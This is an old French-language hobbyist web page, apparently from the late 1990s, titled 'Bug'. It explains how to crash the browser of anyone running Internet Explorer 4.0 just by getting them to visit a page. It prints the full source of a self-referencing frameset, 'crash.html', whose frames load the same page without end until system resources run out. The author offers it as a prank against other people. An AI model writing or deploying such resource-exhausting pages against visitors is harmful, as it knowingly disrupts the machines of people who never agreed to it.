<html>

<head>
<title>Bug</title>
</head>

<body bgcolor="#000000" text="#FFFFFF">

<p align="center"><font color="#FF0000" size="5"><b>BUG ! </b></font></p>

<p>vous savez surement faire planter windows, c facile il suffit de l'utiliser ! mais
savez vous comment faire planter une personne utilisant internet explorer 4.0 (et peut
etre tous les autres explorateurs) juste en leur fesant consulter une page web ? </p>

<p>d'abord il nous faut creer une page web avec des frames, et la methode consiste a faire
que l'une des frames appeles le document sur le quel y'as les frames voila une source : </p>

<p>on va appeler cette page : "crash.html"</p>

<p>
&lt;html&gt;
&lt;head&gt;<br>
&lt;title&gt;Bug&lt;/title&gt;<br>
&lt;/head&gt;<br>
&lt;frameset framespacing=&quot;0&quot; border=&quot;1&quot; frameborder=&quot;1&quot; cols=&quot;200,*&quot;&gt;<br>
    &lt;frame name=&quot;menu&quot;  src=&quot;crash.html&quot; scrolling=auto marginwidth=&quot;0&quot; marginheight=&quot;0&quot; noresize&gt;<br>
    &lt;frame name=&quot;main&quot; src=&quot;crash.html&quot; scrolling=auto marginwidth=&quot;0&quot; marginheight=&quot;0&quot;&gt;<br>
&lt;/frameset&gt;<br>
&lt;/html&gt;<br>
</p>

<p>
au bout de quelque seconde il m'affiche une boite de dialogue style windows 3.1 qui me dit que les
ressources systemes sont extremement basses, voules vous fermer crash.html ?<br>
et meme en repondant non, mon ordi continue a marcher au ralenti, et me redit la meme chose d�s que je touche a quoi que ce soit !<br>
mais bon mon ordi il est bizarre :) c peut etre un bug qui marche que chez moi :p !
</p>

</body>
</html>
